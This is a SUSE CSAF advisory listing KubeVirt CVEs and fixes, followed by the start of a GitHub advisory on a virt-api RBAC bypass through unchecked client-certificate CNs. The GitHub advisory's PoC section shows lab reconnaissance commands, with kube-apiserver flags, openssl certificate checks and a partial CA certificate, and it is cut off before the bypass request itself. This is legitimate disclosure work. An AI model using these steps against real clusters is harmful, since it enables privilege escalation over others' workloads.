"product": {
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-containers:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
},
"product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
},
"product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64437",
"url": "https://www.suse.com/security/cve/CVE-2025-64437"
},
{
"category": "external",
"summary": "SUSE Bug 1253194 for CVE-2025-64437",
"url": "https://bugzilla.suse.com/1253194"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.9,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "low"
}
],
"title": "CVE-2025-64437"
}
]
}
GHSA-38JW-G2QX-4286
Vulnerability from github – Published: 2025-11-06 23:32 – Updated: 2025-11-17 21:44
VLAI?
Summary
KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer
Details
Summary
_Short summary of the problem. Make the impact and severity as clear as possible.
A flawed implementation of the Kubernetes aggregation layer's authentication flow could enable bypassing RBAC controls.
Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap.
The Kubernetes API server proxies received client requests through a component called aggregator (part of K8S's API server), and authenticates to the virt-api server using a certificate signed by the CA specified via the --requestheader-client-ca-file CLI flag. This CA bundle is primarily used in the context of aggregated API servers, where the Kubernetes API server acts as a trusted front-end proxy forwarding requests.
While this is the most common use case, the same CA bundle can also support less common scenarios, such as issuing certificates to authenticating front-end proxies. These proxies can be deployed by organizations to extend Kubernetes' native authentication mechanisms or to integrate with existing identity systems (e.g., LDAP, OAuth2, SSO platforms). In such cases, the Kubernetes API server can trust these external proxies as legitimate authenticators, provided their client certificates are signed by the same CA as the one defined via --requestheader-client-ca-file.
Nevertheless, these external authentication proxies are not supposed to directly communicate with aggregated API servers.
Thus, by failing to validate the CN field in the client TLS certificate, the virt-api component may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component.
However, two key prerequisites must be met for successful exploitation:
-
The attacker must possess a valid front-end proxy certificate signed by the trusted CA (
requestheader-client-ca-file). For example, they can steal the certificate material by compromising a front-end proxy or they could obtain a bundle by exploiting a poorly configured and managed PKI system. -
The attacker must have network access to the
virt-apiservice, such as via a compromised or controlled pod within the cluster.
These conditions significantly reduce the likelihood of exploitation. In addition, the virt-api component acts as a sub-resource server, meaning it only handles requests for specific resources and sub-resources . The handled by it requests are mostly related to the lifecycle of already existing resources.
Nonetheless, if met, the vulnerability could be exploited by a Pod-Level Attacker to escalate privileges, and manipulate existing virtual machine workloads potentially leading to violation of their CIA (Confidentiality, Integrity and Availability).
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
Bypassing authentication
In this section, it is demonstrated how an attacker could use a certificate with a different CN field to bypass the authentication of the aggregation layer and perform arbitrary API sub-resource requests to the virt-api server.
The kube-apiserver has been launched with the following CLI flags:
admin@minikube:~$ kubectl -n kube-system describe pod kube-apiserver-minikube | grep Command -A 28
Command:
kube-apiserver
--advertise-address=192.168.49.2
--allow-privileged=true
--authorization-mode=Node,RBAC
--client-ca-file=/var/lib/minikube/certs/ca.crt
--enable-admission-plugins=NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota
--enable-bootstrap-token-auth=true
--etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt
--etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt
--etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key
--etcd-servers=https://127.0.0.1:2379
--kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt
--kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key
--kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
--proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt
--proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key
--requestheader-allowed-names=front-proxy-client
--requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt
--requestheader-extra-headers-prefix=X-Remote-Extra-
--requestheader-group-headers=X-Remote-Group
--requestheader-username-headers=X-Remote-User
--secure-port=8443
--service-account-issuer=https://kubernetes.default.svc.cluster.local
--service-account-key-file=/var/lib/minikube/certs/sa.pub
--service-account-signing-key-file=/var/lib/minikube/certs/sa.key
--service-cluster-ip-range=10.96.0.0/12
--tls-cert-file=/var/lib/minikube/certs/apiserver.crt
--tls-private-key-file=/var/lib/minikube/certs/apiserver.key
By default, Minikube generates a self-signed CA certificate (var/lib/minikube/certs/front-proxy-ca.crt) and use it to sign the certificate used by the aggregator (/var/lib/minikube/certs/front-proxy-client.crt):
# inspect the self-signed front-proxy-ca certificate
admin@minikube:~$ openssl x509 -text -in /var/lib/minikube/certs/front-proxy-ca.crt | grep -e "Issuer:" -e "Subject:"
Issuer: CN = front-proxy-ca
Subject: CN = front-proxy-ca
# inspect the front-proxy-client certificate signed with the above cert
$ openssl x509 -text -in /var/lib/minikube/certs/front-proxy-client.crt | grep -e "Issuer:" -e "Subject:"
Issuer: CN = front-proxy-ca
Subject: CN = front-proxy-client
One can also inspect the contents of the extension-apiserver-authentication ConfigMap which is used as a trust anchor by all extension API servers:
admin@minikube:~$ kubectl -n kube-system describe configmap extension-apiserver-authentication
Name: extension-apiserver-authentication
Namespace: kube-system
Labels: <none>
Annotations: <none>
Data
====
requestheader-client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDETCCAfmgAwIBAgIIN59KhbrmeJkwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UE
AxMOZnJvbnQtcHJveHktY2EwHhcNMjUwNTE4MTQzMTI3WhcNMzUwNTE2MTQzNjI3
WjAZMRcwFQYDVQQDEw5mcm9udC1wcm94eS1jYTCCASIwDQYJKoZIhvcNAQEBBQAD
